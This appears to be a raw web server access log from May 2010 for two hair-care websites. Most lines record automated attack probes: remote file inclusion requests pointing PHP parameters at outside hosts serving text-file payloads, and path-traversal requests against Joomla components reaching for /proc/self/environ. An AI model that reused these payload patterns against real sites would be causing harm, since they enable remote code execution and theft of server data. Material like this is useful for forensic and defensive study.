81.92.204.67 - - [31/May/2010:00:03:46 -0700] "GET /logs/access_100308.log//journal.php3//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.145.196 - - [31/May/2010:00:06:31 -0700] "GET /logs/access_100308.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.128.84.14 - - [31/May/2010:00:06:47 -0700] "GET /logs//main.php?sayfa=http://flatmates.ru/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.128.84.14 - - [31/May/2010:00:06:47 -0700] "GET /logs/access_100510.log%20%20//main.php?sayfa=http://flatmates.ru/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.128.84.14 - - [31/May/2010:00:06:47 -0700] "GET /main.php?sayfa=http://flatmates.ru/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.128.84.14 - - [31/May/2010:00:06:52 -0700] "GET /logs/access_091221.log%20%20//main.php?sayfa=http://flatmates.ru/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
193.126.206.28 - - [31/May/2010:00:08:40 -0700] "GET /main.php?sayfa=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
193.126.206.28 - - [31/May/2010:00:08:40 -0700] "GET /logs//main.php?sayfa=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
193.126.206.28 - - [31/May/2010:00:08:41 -0700] "GET /logs/access.log%20%20//main.php?sayfa=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.221.130.25 - - [31/May/2010:00:09:22 -0700] "GET /main.php?sayfa=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.221.130.25 - - [31/May/2010:00:09:22 -0700] "GET /logs//main.php?sayfa=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.221.130.25 - - [31/May/2010:00:09:22 -0700] "GET /logs/access.log%20%20//main.php?sayfa=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.221.130.25 - - [31/May/2010:00:09:36 -0700] "GET /main.php?sayfa=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.221.130.25 - - [31/May/2010:00:09:36 -0700] "GET /logs/access.log%20%20//main.php?sayfa=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.221.130.25 - - [31/May/2010:00:09:36 -0700] "GET /logs//main.php?sayfa=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
178.63.41.9 - - [31/May/2010:00:09:45 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:09:45 -0700] "GET / HTTP/1.1" 200 926 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:09:45 -0700] "GET /?N=D HTTP/1.1" 200 926 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:09:46 -0700] "GET /?M=A HTTP/1.1" 200 926 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:09:46 -0700] "GET /?S=A HTTP/1.1" 200 926 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:09:46 -0700] "GET /?D=A HTTP/1.1" 200 926 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:09:47 -0700] "GET /freehairsecretsphp/ HTTP/1.1" 200 349 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:09:47 -0700] "GET /logs/ HTTP/1.1" 200 5657 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:09:48 -0700] "GET /tmp/ HTTP/1.1" 200 659 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:09:48 -0700] "GET /?N=A HTTP/1.1" 200 926 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:09:48 -0700] "GET /?M=A HTTP/1.1" 200 926 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:09:48 -0700] "GET /?S=A HTTP/1.1" 200 926 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:09:49 -0700] "GET /?D=A HTTP/1.1" 200 926 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:09:49 -0700] "GET /tmp/ HTTP/1.1" 200 659 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:09:49 -0700] "GET /logs/ HTTP/1.1" 200 5657 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:09:49 -0700] "GET /freehairsecretsphp/ HTTP/1.1" 200 349 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:09:50 -0700] "GET /?M=D HTTP/1.1" 200 926 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:09:50 -0700] "GET /?S=D HTTP/1.1" 200 926 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:09:50 -0700] "GET /?D=D HTTP/1.1" 200 926 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:09:50 -0700] "GET /logs/?N=D HTTP/1.1" 200 5657 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:09:51 -0700] "GET /logs/?M=A HTTP/1.1" 200 5657 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:09:51 -0700] "GET /logs/?S=A HTTP/1.1" 200 5657 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:09:51 -0700] "GET /logs/?D=A HTTP/1.1" 200 5657 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:09:52 -0700] "GET /logs/access.log HTTP/1.1" 200 204949 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:09:54 -0700] "GET /logs/access_091012.log HTTP/1.1" 200 766310 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:09:55 -0700] "GET /logs/access_091019.log HTTP/1.1" 200 561992 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:09:57 -0700] "GET /logs/access_091026.log HTTP/1.1" 200 562644 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:09:59 -0700] "GET /logs/access_091102.log HTTP/1.1" 200 696678 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:10:01 -0700] "GET /logs/access_091109.log HTTP/1.1" 200 589584 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:10:02 -0700] "GET /logs/access_091116.log HTTP/1.1" 200 718477 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:10:04 -0700] "GET /logs/access_091123.log HTTP/1.1" 200 1294739 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:10:06 -0700] "GET /logs/access_091130.log HTTP/1.1" 200 674055 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:10:10 -0700] "GET /logs/access_091214.log HTTP/1.1" 200 793223 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:10:12 -0700] "GET /logs/access_091221.log HTTP/1.1" 200 760051 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:10:13 -0700] "GET /logs/access_091228.log HTTP/1.1" 200 636872 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:10:15 -0700] "GET /logs/access_100104.log HTTP/1.1" 200 553567 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:10:17 -0700] "GET /logs/access_100111.log HTTP/1.1" 200 1004971 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
91.121.145.89 - - [31/May/2010:00:10:17 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:10:19 -0700] "GET /logs/access_100118.log HTTP/1.1" 200 1274743 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:10:21 -0700] "GET /logs/access_100125.log HTTP/1.1" 200 1137050 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
89.107.213.98 - - [31/May/2010:00:10:24 -0700] "GET /logs/?baseDir=http://www.nd-burma.org/logs/tmp/fx29id1.txt??? HTTP/1.1" 200 5657 "-" "Mozilla/5.0" "growlonghairfast.com"
89.107.213.98 - - [31/May/2010:00:10:24 -0700] "GET /?baseDir=http://www.nd-burma.org/logs/tmp/fx29id1.txt??? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
89.107.213.98 - - [31/May/2010:00:10:25 -0700] "GET /logs/access_100308.log%20%20/?baseDir=http://www.nd-burma.org/logs/tmp/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:10:26 -0700] "GET /logs/access_100201.log HTTP/1.1" 200 2509489 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:10:33 -0700] "GET /logs/access_100208.log HTTP/1.1" 200 3021819 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:10:44 -0700] "GET /logs/access_100215.log HTTP/1.1" 200 3655063 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:10:52 -0700] "GET /logs/access_100222.log HTTP/1.1" 200 3322730 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:10:57 -0700] "GET /logs/access_100301.log HTTP/1.1" 200 2120251 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
213.128.84.14 - - [31/May/2010:00:11:01 -0700] "GET /main.php?sayfa=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.128.84.14 - - [31/May/2010:00:11:01 -0700] "GET /logs//main.php?sayfa=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:11:03 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 2199574 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
213.128.84.14 - - [31/May/2010:00:11:04 -0700] "GET /logs/access_100510.log%20%20//main.php?sayfa=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.128.84.14 - - [31/May/2010:00:11:05 -0700] "GET /logs/access_091221.log%20%20//main.php?sayfa=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:11:11 -0700] "GET /logs/access_100315.log HTTP/1.1" 200 2504047 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:11:16 -0700] "GET /logs/access_100322.log HTTP/1.1" 200 2573876 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
62.44.82.61 - - [31/May/2010:00:11:19 -0700] "GET /main.php?sayfa=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [31/May/2010:00:11:19 -0700] "GET /logs/access_100412.log//main.php?sayfa=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [31/May/2010:00:11:19 -0700] "GET /logs//main.php?sayfa=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:11:21 -0700] "GET /logs/access_100329.log HTTP/1.1" 200 2946869 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
91.121.145.89 - - [31/May/2010:00:11:24 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
62.44.82.61 - - [31/May/2010:00:11:24 -0700] "GET /logs/access.log//main.php?sayfa=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
178.63.41.9 - - [31/May/2010:00:11:25 -0700] "GET /logs/access_100405.log HTTP/1.1" 200 2516499 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:11:31 -0700] "GET /logs/access_100412.log HTTP/1.1" 200 2139776 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:11:35 -0700] "GET /logs/access_100419.log HTTP/1.1" 200 2205014 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:11:40 -0700] "GET /logs/access_100426.log HTTP/1.1" 200 2491092 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:11:46 -0700] "GET /logs/access_100503.log HTTP/1.1" 200 2519989 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:11:55 -0700] "GET /logs/access_100510.log HTTP/1.1" 200 2798780 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:12:02 -0700] "GET /logs/access_100517.log HTTP/1.1" 200 3119686 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:12:06 -0700] "GET /logs/access_100524.log HTTP/1.1" 200 2784909 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:12:12 -0700] "GET /logs/access_100531.log HTTP/1.1" 200 3581898 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:12:14 -0700] "GET /logs/scripts.log HTTP/1.1" 200 24805 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:12:14 -0700] "GET /tmp/?N=D HTTP/1.1" 200 659 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:12:14 -0700] "GET /tmp/?M=A HTTP/1.1" 200 659 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:12:14 -0700] "GET /tmp/?S=A HTTP/1.1" 200 659 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:12:15 -0700] "GET /tmp/?D=A HTTP/1.1" 200 659 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
178.63.41.9 - - [31/May/2010:00:12:15 -0700] "GET /tmp/mailError.log HTTP/1.1" 200 62167 "-" "Cityreview Robot (+http://www.cityreview.org/crawler/)" "growlonghairfast.com"
213.128.84.14 - - [31/May/2010:00:14:05 -0700] "GET /logs//main.php?sayfa=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.128.84.14 - - [31/May/2010:00:14:05 -0700] "GET /main.php?sayfa=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.128.84.14 - - [31/May/2010:00:14:08 -0700] "GET /logs/access_100510.log%20%20//main.php?sayfa=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.128.84.14 - - [31/May/2010:00:14:09 -0700] "GET /logs/access_091221.log%20%20//main.php?sayfa=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [31/May/2010:00:15:48 -0700] "GET /freehairsecretsphp/viewtopic.php?p=7432 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
91.121.145.89 - - [31/May/2010:00:16:32 -0700] "GET /logs/access_100510.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.145.89 - - [31/May/2010:00:16:32 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.145.89 - - [31/May/2010:00:16:32 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
89.107.213.98 - - [31/May/2010:00:19:24 -0700] "GET /?baseDir=http://www.nd-burma.org/logs/tmp/fx29id1.txt??? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
89.107.213.98 - - [31/May/2010:00:19:25 -0700] "GET /logs/?baseDir=http://www.nd-burma.org/logs/tmp/fx29id1.txt??? HTTP/1.1" 200 5657 "-" "Mozilla/5.0" "www.freehairsecrets.com"
193.126.206.28 - - [31/May/2010:00:19:25 -0700] "GET /logs/access_100412.log//main.php?sayfa=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.107.213.98 - - [31/May/2010:00:19:26 -0700] "GET /logs/access.log%20%20/?baseDir=http://www.nd-burma.org/logs/tmp/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
193.126.206.28 - - [31/May/2010:00:19:30 -0700] "GET /logs/access.log//main.php?sayfa=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.121.217.207 - - [31/May/2010:00:25:03 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://pitsounologos.com/pbox/ID1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.217.207 - - [31/May/2010:00:25:03 -0700] "GET /Neos_Chronos/header.php?base_folder=http://pitsounologos.com/pbox/ID1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.217.207 - - [31/May/2010:00:25:03 -0700] "GET /logs/access_100208.log%20%20//Neos_Chronos/header.php?base_folder=http://pitsounologos.com/pbox/ID1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.145.196 - - [31/May/2010:00:27:00 -0700] "GET /logs/access_100308.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.217.207 - - [31/May/2010:00:27:14 -0700] "GET /logs/access_100405.log%20%20//Neos_Chronos/header.php?base_folder=http://pitsounologos.com/pbox/ID1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.217.207 - - [31/May/2010:00:27:33 -0700] "GET /logs/access.log%20%20//Neos_Chronos/header.php?base_folder=http://pitsounologos.com/pbox/ID1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.121.217.207 - - [31/May/2010:00:27:34 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://pitsounologos.com/pbox/ID1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.121.217.207 - - [31/May/2010:00:27:34 -0700] "GET /Neos_Chronos/header.php?base_folder=http://pitsounologos.com/pbox/ID1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.121.145.89 - - [31/May/2010:00:31:36 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.145.89 - - [31/May/2010:00:31:37 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.145.89 - - [31/May/2010:00:31:37 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
67.228.226.12 - - [31/May/2010:00:34:02 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
220.73.161.132 - - [31/May/2010:00:34:50 -0700] "GET /////skin/board/moviefl/download.php?board_skin_path=http://xovev.110mb.com/z1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.73.161.132 - - [31/May/2010:00:34:55 -0700] "GET /logs/access_100510.log%20%20//////skin/board/moviefl/download.php?board_skin_path=http://xovev.110mb.com/z1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.73.161.132 - - [31/May/2010:00:34:55 -0700] "GET /logs//////skin/board/moviefl/download.php?board_skin_path=http://xovev.110mb.com/z1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.25 - - [31/May/2010:00:35:01 -0700] "GET /logs/access_100412.log//main.php?sayfa=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.25 - - [31/May/2010:00:35:04 -0700] "GET /logs/access.log//main.php?sayfa=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.73.161.132 - - [31/May/2010:00:35:14 -0700] "GET /logs/access_100510.log%20%20//////skin/board/moviefl/download.php?board_skin_path=http://xovev.110mb.com/z1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.73.161.132 - - [31/May/2010:00:35:14 -0700] "GET /logs//////skin/board/moviefl/download.php?board_skin_path=http://xovev.110mb.com/z1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.25 - - [31/May/2010:00:35:19 -0700] "GET /logs/access_100412.log//main.php?sayfa=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.25 - - [31/May/2010:00:35:23 -0700] "GET /logs/access.log//main.php?sayfa=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.121.217.207 - - [31/May/2010:00:36:13 -0700] "GET /logs/access_100208.log//Neos_Chronos/header.php?base_folder=http://pitsounologos.com/pbox/ID1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.217.207 - - [31/May/2010:00:36:41 -0700] "GET /logs/access_100405.log//Neos_Chronos/header.php?base_folder=http://pitsounologos.com/pbox/ID1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [31/May/2010:00:36:52 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14259 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
174.121.217.207 - - [31/May/2010:00:37:14 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://pitsounologos.com/pbox/ID1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.43.180.250 - - [31/May/2010:00:37:16 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
72.55.146.200 - - [31/May/2010:00:39:24 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
72.55.146.200 - - [31/May/2010:00:39:24 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
72.55.146.200 - - [31/May/2010:00:39:24 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
72.55.146.200 - - [31/May/2010:00:39:33 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
72.55.146.200 - - [31/May/2010:00:39:33 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
72.55.146.200 - - [31/May/2010:00:39:33 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
